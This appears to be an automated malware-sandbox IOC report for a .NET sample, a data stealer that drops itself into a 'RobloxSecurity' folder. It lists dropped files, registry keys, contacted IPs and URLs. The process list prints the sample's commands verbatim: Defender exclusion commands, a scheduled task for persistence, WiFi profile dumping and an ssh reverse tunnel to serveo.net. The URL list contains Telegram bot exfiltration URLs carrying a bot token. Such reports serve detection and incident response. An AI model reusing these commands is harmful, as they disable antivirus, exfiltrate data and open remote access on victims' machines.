IOC Report
jqOHOuPMJP.exe

loading gif

Files

File Path
Type
Category
Malicious
jqOHOuPMJP.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_vkefq4cv.oil.exe_8bda737a63465ab69884df6bd58af130501f7e94_ea868dc5_2dd495ae-2f75-472c-b3ff-2ce61eb255a3\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB81.tmp.dmp
Mini DuMP crash report, 16 streams, Sat Feb 10 15:17:23 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE32.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE62.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\.ssh\known_hosts
ASCII text, with very long lines (404), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\4cn9n9irdf\p.dat
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\4cn9n9irdf\report.lock
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\vkefq4cv.oil.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jqOHOuPMJP.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2h200bfl.rmg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jghiq33d.kjq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mc5dlpdd.are.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nt4c2ncj.tfe.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\hahahahaha.txt
ASCII text, with CRLF line terminators
modified
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
\Device\Null
ASCII text, with CRLF line terminators, with overstriking
dropped
There are 10 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\jqOHOuPMJP.exe
C:\Users\user\Desktop\jqOHOuPMJP.exe
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
malicious
C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe
"C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
malicious
C:\Windows\System32\schtasks.exe
schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f
malicious
C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
"C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"
malicious
C:\Windows\System32\cmd.exe
cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
malicious
C:\Windows\System32\netsh.exe
netsh wlan show profiles
malicious
C:\Windows\System32\cmd.exe
cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
malicious
C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
malicious
C:\Windows\System32\netsh.exe
netsh wlan show networks mode=bssid
malicious
C:\Windows\System32\cmd.exe
cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
malicious
C:\Windows\System32\netsh.exe
netsh wlan show profiles
malicious
C:\Windows\System32\cmd.exe
cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
malicious
C:\Windows\System32\netsh.exe
netsh wlan show networks mode=bssid
malicious
C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
malicious
C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
malicious
C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
malicious
C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\chcp.com
chcp 65001
C:\Windows\System32\timeout.exe
timeout /t 3
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\chcp.com
chcp 65001
C:\Windows\System32\findstr.exe
findstr /R /C:"[ ]:[ ]"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\chcp.com
chcp 65001
C:\Windows\System32\findstr.exe
findstr "SSID BSSID Signal"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\chcp.com
chcp 65001
C:\Windows\System32\findstr.exe
findstr /R /C:"[ ]:[ ]"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\chcp.com
chcp 65001
C:\Windows\System32\findstr.exe
findstr "SSID BSSID Signal"
C:\Windows\System32\OpenSSH\ssh.exe
"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\OpenSSH\ssh.exe
"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632
There are 31 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://api.tele
unknown
malicious
http://193.142.58.127:80
unknown
http://www.microsoft.co(=
unknown
http://216.250.190.139:80
unknown
https://duckduckgo.com/chrome_newtab
unknown
https://duckduckgo.com/ac/?q=
unknown
http://23.224.102.6:8001
unknown
https://api.telegram.org/bot
unknown
https://e2111f95f52ba8be6b2d3394e38b1722.se
unknown
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML
149.154.167.220
http://185.119.118.59:8080
unknown
http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
unknown
http://107.161.20.142:8080
unknown
http://185.119.118.59:80802
unknown
http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
unknown
https://13.231.21.109:443
unknown
https://192.99.196.191:443
unknown
https://e483612b93e055308d0c85f365c474ee.serveo.net/
unknown
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML
149.154.167.220
http://ip-api.com/line?fields=query,country
208.95.112.1
https://aka.ms/pscore6lB
unknown
http://66.42.56.128:80
unknown
https://nuget.org/nuget.exe
unknown
http://ip-api.com
unknown
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=51697
unknown
https://64.227.21.98:443
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://185.119.118.59:8080/get
unknown
http://185.119.118.59:8080/s9VbfeJdTs/hkLYW_user
unknown
http://129.151.109.160:8080
unknown
http://127.0.0.1:6787/
unknown
http://82.147.85
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://82.147.85.194/byte/@jokerbot880901.txt
82.147.85.194
http://23.248.176.37:180
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
unknown
http://ip-api.com/line?fields=query
unknown
http://185.119.118.59:8080/hkLYW_user%40468325_report.wsr
unknown
https://www.ecosia.org/newtab/
unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
unknown
https://github.com/Pester/Pester
unknown
http://185.119.118.59
unknown
http://127.0.0.1:
unknown
http://45.61.136.52:80
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
http://e2111f95f52ba8be6b2d3394e38b1722.serveo.net:6787//e2111f95f52ba8be6b2d3394e38b1722.serveo.net
unknown
http://185.119.118.59:8080/hkLYW_user
unknown
http://45.61.136.13:80
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
unknown
http://api.telegram.org
unknown
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML
149.154.167.220
http://154.26.128.6:80
unknown
http://212.6.44.53:8080
unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
unknown
http://185.217.98.121:80
unknown
https://api.telegram.org
unknown
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML
149.154.167.220
https://contoso.com/License
unknown
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
unknown
https://44.228.161.50:443
unknown
http://104.248.208.221:80
unknown
https://164.90.185.9:443
unknown
http://www.w3.
unknown
http://18.228.80.130:80
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
http://185.217.98.121:8080
unknown
http://nuget.org/NuGet.exe
unknown
http://193.142.58.127:80Pk
unknown
https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net
unknown
https://e483612b93e055308d0c85f365c474ee.serveo.net
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://144.126.132.141:8080
unknown
http://pesterbdd.com/i?
unknown
https://18.178.28.151:443
unknown
http://82.147.85.194/byte/
unknown
http://upx.sf.net
unknown
http://127.0.0.1:6787/ing=no
unknown
http://149.88.44.159:80
unknown
http://82.147.85.194
unknown
https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net/
unknown
https://185.217.98.121:443
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
http://116.202.101.219:8080
unknown
http://206.189.109.146:80
unknown
http://127.0.0.1:18772/handleOpenWSR?r=
unknown
https://support.mozilla.org
unknown
https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip
unknown
http://185.119.118.59:8080/%68%6B%4C%59%57%5F%6A%6F%6E%65%73%40%34%36%38%33%32%35%5F%72%65%70%6F%72%
unknown
http://crl.v
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
There are 88 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
serveo.net
138.68.79.95
ip-api.com
208.95.112.1
api.telegram.org
149.154.167.220

IPs

IP
Domain
Country
Malicious
82.147.85.194
unknown
Russian Federation
208.95.112.1
ip-api.com
United States
149.154.167.220
api.telegram.org
United Kingdom
138.68.79.95
serveo.net
United States
127.0.0.1
unknown
unknown
185.119.118.59
unknown
Austria

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA
malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance
Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jqOHOuPMJP_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jqOHOuPMJP_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jqOHOuPMJP_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jqOHOuPMJP_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jqOHOuPMJP_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jqOHOuPMJP_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jqOHOuPMJP_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jqOHOuPMJP_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jqOHOuPMJP_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jqOHOuPMJP_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jqOHOuPMJP_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jqOHOuPMJP_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jqOHOuPMJP_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jqOHOuPMJP_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vkefq4cv_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vkefq4cv_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vkefq4cv_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vkefq4cv_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vkefq4cv_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vkefq4cv_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vkefq4cv_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vkefq4cv_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vkefq4cv_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vkefq4cv_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vkefq4cv_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vkefq4cv_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vkefq4cv_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\vkefq4cv_RASMANCS
FileDirectory
\REGISTRY\A\{28a56bea-1ad6-2dad-8aac-60339a0a2708}\Root\InventoryApplicationFile\vkefq4cv.oil.exe|197b683f7c7b95fd
ProgramId
\REGISTRY\A\{28a56bea-1ad6-2dad-8aac-60339a0a2708}\Root\InventoryApplicationFile\vkefq4cv.oil.exe|197b683f7c7b95fd
FileId
\REGISTRY\A\{28a56bea-1ad6-2dad-8aac-60339a0a2708}\Root\InventoryApplicationFile\vkefq4cv.oil.exe|197b683f7c7b95fd
LowerCaseLongPath
\REGISTRY\A\{28a56bea-1ad6-2dad-8aac-60339a0a2708}\Root\InventoryApplicationFile\vkefq4cv.oil.exe|197b683f7c7b95fd
LongPathHash
\REGISTRY\A\{28a56bea-1ad6-2dad-8aac-60339a0a2708}\Root\InventoryApplicationFile\vkefq4cv.oil.exe|197b683f7c7b95fd
Name
\REGISTRY\A\{28a56bea-1ad6-2dad-8aac-60339a0a2708}\Root\InventoryApplicationFile\vkefq4cv.oil.exe|197b683f7c7b95fd
OriginalFileName
\REGISTRY\A\{28a56bea-1ad6-2dad-8aac-60339a0a2708}\Root\InventoryApplicationFile\vkefq4cv.oil.exe|197b683f7c7b95fd
Publisher
\REGISTRY\A\{28a56bea-1ad6-2dad-8aac-60339a0a2708}\Root\InventoryApplicationFile\vkefq4cv.oil.exe|197b683f7c7b95fd
Version
\REGISTRY\A\{28a56bea-1ad6-2dad-8aac-60339a0a2708}\Root\InventoryApplicationFile\vkefq4cv.oil.exe|197b683f7c7b95fd
BinFileVersion
\REGISTRY\A\{28a56bea-1ad6-2dad-8aac-60339a0a2708}\Root\InventoryApplicationFile\vkefq4cv.oil.exe|197b683f7c7b95fd
BinaryType
\REGISTRY\A\{28a56bea-1ad6-2dad-8aac-60339a0a2708}\Root\InventoryApplicationFile\vkefq4cv.oil.exe|197b683f7c7b95fd
ProductName
\REGISTRY\A\{28a56bea-1ad6-2dad-8aac-60339a0a2708}\Root\InventoryApplicationFile\vkefq4cv.oil.exe|197b683f7c7b95fd
ProductVersion
\REGISTRY\A\{28a56bea-1ad6-2dad-8aac-60339a0a2708}\Root\InventoryApplicationFile\vkefq4cv.oil.exe|197b683f7c7b95fd
LinkDate
\REGISTRY\A\{28a56bea-1ad6-2dad-8aac-60339a0a2708}\Root\InventoryApplicationFile\vkefq4cv.oil.exe|197b683f7c7b95fd
BinProductVersion
\REGISTRY\A\{28a56bea-1ad6-2dad-8aac-60339a0a2708}\Root\InventoryApplicationFile\vkefq4cv.oil.exe|197b683f7c7b95fd
AppxPackageFullName
\REGISTRY\A\{28a56bea-1ad6-2dad-8aac-60339a0a2708}\Root\InventoryApplicationFile\vkefq4cv.oil.exe|197b683f7c7b95fd
AppxPackageRelativeId
\REGISTRY\A\{28a56bea-1ad6-2dad-8aac-60339a0a2708}\Root\InventoryApplicationFile\vkefq4cv.oil.exe|197b683f7c7b95fd
Size
\REGISTRY\A\{28a56bea-1ad6-2dad-8aac-60339a0a2708}\Root\InventoryApplicationFile\vkefq4cv.oil.exe|197b683f7c7b95fd
Language
\REGISTRY\A\{28a56bea-1ad6-2dad-8aac-60339a0a2708}\Root\InventoryApplicationFile\vkefq4cv.oil.exe|197b683f7c7b95fd
Usn
There are 40 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
167D1889000
trusted library allocation
page read and write
malicious
1EC01AD9000
trusted library allocation
page read and write
malicious
1F997DF1000
trusted library allocation
page read and write
malicious
17A00001000
trusted library allocation
page read and write
malicious
E6E000
stack
page read and write
1B8ADCB7000
trusted library allocation
page read and write
89B0000
heap
page read and write
30ACEFE000
stack
page read and write
4F4C000
stack
page read and write
10DE7C0D000
trusted library allocation
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
10DE7C71000
trusted library allocation
page read and write
1B8C440D000
heap
page read and write
2BE0000
trusted library allocation
page read and write
1EC7F290000
heap
page read and write
167D17BE000
trusted library allocation
page read and write
22BB8350000
heap
page read and write
10DE7B89000
trusted library allocation
page read and write
1B8C5F19000
heap
page read and write
7FFD9B91C000
trusted library allocation
page execute and read and write
1B8ADCD3000
trusted library allocation
page read and write
1B8ADCCB000
trusted library allocation
page read and write
1B8C4453000
heap
page read and write
29B0000
trusted library allocation
page read and write
1B8BD876000
trusted library allocation
page read and write
10DE8B67000
trusted library allocation
page read and write
5AA5000
trusted library allocation
page read and write
167D192E000
trusted library allocation
page read and write
10DD5A00000
heap
page read and write
30ACFFD000
stack
page read and write
6F857FE000
stack
page read and write
213714A0000
heap
page read and write
10DE7B79000
trusted library allocation
page read and write
10DD746B000
trusted library allocation
page read and write
7FFD9B8FC000
trusted library allocation
page execute and read and write
2926087F000
heap
page read and write
7FFD9B854000
trusted library allocation
page read and write
167D1848000
trusted library allocation
page read and write
2ABCB240000
heap
page read and write
167EA110000
heap
page read and write
10DE8BEC000
trusted library allocation
page read and write
167E176F000
trusted library allocation
page read and write
1B8ADC9F000
trusted library allocation
page read and write
1B8BCFE1000
trusted library allocation
page read and write
4A6D000
trusted library allocation
page execute and read and write
1B8C4900000
heap
page read and write
88AD000
heap
page read and write
4E1D000
stack
page read and write
1F997B50000
heap
page read and write
1B8AB860000
heap
page read and write
10DD7320000
heap
page read and write
29260760000
heap
page read and write
233B5D48000
heap
page read and write
30B9000
heap
page read and write
17A7140D000
heap
page read and write
4A95000
trusted library allocation
page execute and read and write
1B8AB710000
heap
page execute and read and write
72DD000
stack
page read and write
167D1929000
trusted library allocation
page read and write
65CE000
stack
page read and write
7FFD9BA40000
trusted library allocation
page execute and read and write
22D31560000
heap
page read and write
1B8C57CF000
heap
page read and write
2ABCB1D0000
heap
page read and write
1EC7F363000
heap
page read and write
1B8C5788000
heap
page read and write
51ED000
stack
page read and write
617A000
trusted library allocation
page read and write
1B8C6B73000
heap
page read and write
1B8C565A000
heap
page read and write
1EC019FB000
trusted library allocation
page read and write
17A713EB000
heap
page read and write
10DE7F45000
trusted library allocation
page read and write
1B8C55F6000
heap
page read and write
10DE76D7000
trusted library allocation
page read and write
21371430000
heap
page read and write
10DD7B6E000
trusted library allocation
page read and write
5842000
trusted library allocation
page read and write
29E0000
trusted library allocation
page read and write
1B8C4BA9000
heap
page read and write
10DD73E0000
heap
page execute and read and write
10DE7577000
trusted library allocation
page read and write
167D17ED000
trusted library allocation
page read and write
769E000
stack
page read and write
1B8ADC7D000
trusted library allocation
page read and write
2CD7F2000
stack
page read and write
10DF0DF0000
heap
page read and write
17A713D0000
heap
page read and write
7FFD9B85D000
trusted library allocation
page execute and read and write
8BDB000
stack
page read and write
1F997F9F000
trusted library allocation
page read and write
167D17A7000
trusted library allocation
page read and write
19B79C50000
heap
page read and write
10DD753A000
trusted library allocation
page read and write
1EC29FE0000
heap
page read and write
10DE7B9B000
trusted library allocation
page read and write
2DC0000
heap
page read and write
1B8C5EB5000
heap
page read and write
2ABCB245000
heap
page read and write
6F850FF000
stack
page read and write
7FFD9B860000
trusted library allocation
page read and write
10DE7488000
trusted library allocation
page read and write
10DE8DA1000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page execute and read and write
1EC7F2B5000
heap
page read and write
10DE8CB6000
trusted library allocation
page read and write
1B8C477C000
heap
page read and write
29D0000
trusted library allocation
page read and write
19B7998A000
heap
page read and write
2B90000
trusted library allocation
page read and write
2DF0000
trusted library section
page read and write
1B8ADCD1000
trusted library allocation
page read and write
167E1761000
trusted library allocation
page read and write
10DE8BBB000
trusted library allocation
page read and write
10DE8C76000
trusted library allocation
page read and write
29DD000
trusted library allocation
page execute and read and write
17A712E0000
heap
page read and write
6111000
trusted library allocation
page read and write
14CAAFB0000
heap
page read and write
1B8C4B37000
heap
page read and write
1B8C7008000
heap
page read and write
783F000
heap
page read and write
10DD58C0000
trusted library allocation
page read and write
10DE7E45000
trusted library allocation
page read and write
10DE7567000
trusted library allocation
page read and write
7C10000
trusted library allocation
page execute and read and write
10DE7F9A000
trusted library allocation
page read and write
17A71409000
heap
page read and write
1B8C4E59000
heap
page read and write
1B8C6562000
heap
page read and write
2CE5FF000
stack
page read and write
10DE93A7000
trusted library allocation
page read and write
7FFD9B89D000
trusted library allocation
page execute and read and write
1B8C55B4000
heap
page read and write
30AC9FE000
stack
page read and write
22BB817F000
heap
page read and write
19B798D0000
heap
page read and write
7FFD9B864000
trusted library allocation
page read and write
